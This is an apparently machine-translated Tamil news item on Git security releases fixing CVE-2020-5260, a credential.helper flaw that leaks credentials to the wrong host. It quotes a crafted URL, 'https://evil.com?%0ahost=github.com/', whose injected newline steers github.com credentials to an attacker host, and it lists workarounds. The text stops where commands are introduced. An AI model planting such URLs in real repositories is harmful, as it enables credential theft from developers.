வெளியிடப்பட்டது விநியோகிக்கப்பட்ட மூலக் கட்டுப்பாட்டு அமைப்பு Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 மற்றும் 2.17.4 இன் சரிசெய்தல் வெளியீடுகள் நீக்கப்பட்டது பாதிப்பு (CVE-2020-5260) ஹேண்ட்லரில் "நற்சான்றிதழ்.உதவியாளர்", இது ஒரு புதிய வரி எழுத்துடன் சிறப்பாக வடிவமைக்கப்பட்ட URL ஐப் பயன்படுத்தி ஒரு கிட் கிளையன்ட் ஒரு களஞ்சியத்தை அணுகும்போது தவறான ஹோஸ்டுக்கு நற்சான்றிதழ்கள் அனுப்பப்படும். தாக்குதலால் கட்டுப்படுத்தப்படும் சேவையகத்திற்கு அனுப்பப்படும் மற்றொரு ஹோஸ்டிலிருந்து நற்சான்றிதழ்களை ஏற்பாடு செய்ய பாதிப்பைப் பயன்படுத்தலாம்.
“https://evil.com?%0ahost=github.com/” போன்ற URL ஐக் குறிப்பிடும்போது, ஹோஸ்ட் evil.com உடன் இணைக்கும் போது நற்சான்றிதழ் கையாளுபவர் github.com க்காகக் குறிப்பிடப்பட்ட அங்கீகார அளவுருக்களைக் கடந்து செல்லும். சப்மாட்யூல்களுக்கான செயலாக்க URLகள் உட்பட, "git clone" போன்ற செயல்பாடுகளைச் செய்யும்போது சிக்கல் ஏற்படுகிறது (உதாரணமாக, "git submodule update" ஆனது களஞ்சியத்திலிருந்து .gitmodules கோப்பில் குறிப்பிடப்பட்டுள்ள URLகளை தானாகவே செயலாக்கும்). டெவலப்பர் URL ஐப் பார்க்காமல் ஒரு களஞ்சியத்தை குளோன் செய்யும் சூழ்நிலைகளில் பாதிப்பு மிகவும் ஆபத்தானது, எடுத்துக்காட்டாக, துணைத் தொகுதிகளுடன் பணிபுரியும் போது அல்லது தானியங்கி செயல்களைச் செய்யும் அமைப்புகளில், எடுத்துக்காட்டாக, தொகுப்பு உருவாக்க ஸ்கிரிப்ட்களில்.
புதிய பதிப்புகளில் பாதிப்புகளைத் தடுக்க தடைசெய்யப்பட்டது நற்சான்றிதழ் பரிமாற்ற நெறிமுறை மூலம் அனுப்பப்படும் எந்த மதிப்புகளிலும் புதிய வரி எழுத்தை அனுப்புதல். விநியோகங்களுக்கு, பக்கங்களில் தொகுப்பு புதுப்பிப்புகளின் வெளியீட்டைக் கண்காணிக்கலாம் டெபியன், உபுண்டு, RHEL, SUSE/openSUSE, ஃபெடோரா, ஆர்க், ஃப்ரீ.
சிக்கலைத் தடுப்பதற்கான ஒரு தீர்வாக பரிந்துரைக்கப்படுகிறது பொது களஞ்சியங்களை அணுகும் போது credential.helper ஐப் பயன்படுத்த வேண்டாம் மற்றும் தேர்வு செய்யப்படாத களஞ்சியங்களுடன் "--recurse-submodules" பயன்முறையில் "git clone" ஐப் பயன்படுத்த வேண்டாம். credential.helper handlerஐ முழுவதுமாக முடக்க, இது செய்கிறது பாதுகாப்பு மற்றும் கடவுச்சொற்களை மீட்டெடுக்கிறது தற்காலிக சேமிப்பு, பாதுகாக்கப்பட்டது பெட்டகங்கள் அல்லது கடவுச்சொற்களைக் கொண்ட கோப்பு, நீங்கள் கட்டளைகளைப் பயன்படுத்தலாம்: